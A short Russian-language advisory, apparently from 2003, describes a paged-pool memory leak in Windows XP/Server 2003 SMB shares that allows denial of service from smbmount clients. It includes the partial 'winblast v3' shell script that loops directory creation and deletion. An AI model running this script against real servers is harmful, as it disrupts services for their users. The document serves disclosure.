Уязвимость найдена в Windows XP и Windows 2003 Server.
Если такие ОС шарят папки для Unix клиентов,
использующих smbmount (часть Samba), то каждый из
этих клиентов с правами создания
директорий может вызвать полный и
безоговорочный DoS. Дело в том, что эти ОС
выделяют под каждую вновь создаваемую
директорию определенный объем памяти и не
высвобождаю ее при удалении. Таким образом
организовав цикл по созданию/удалению
каталогов можно исчерпать у сервера всю
память. Ориентировочное число каталогов -
несколько миллионов. Объем памяти сервера в
данной ситуации ни на что не влияет, так как
размер paged pool memory всегда один и тот же, 343 Мб.
Пример скрипта:
#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi
count=0
# using 'pathcount' directories
pathcount=1000
echo running \'winblast v3\' with $pathcount files in loop
...
while [ 1 ]; do
p=$((pathcount*2-1))
stop=$((pathcount-1))
while [ "$p" != "$stop" ]; do
dirname=wbst$p
# delete old directory if it exists, exit on any error
if [ -d $dirname ]; then
rmdir $dirname || exit 3
fi;
# generating directory and exit on any error
mkdir $dirname || exit 1
p=$((p-1))
count=$((count+1))
done;
echo $count directories generated ...
done;
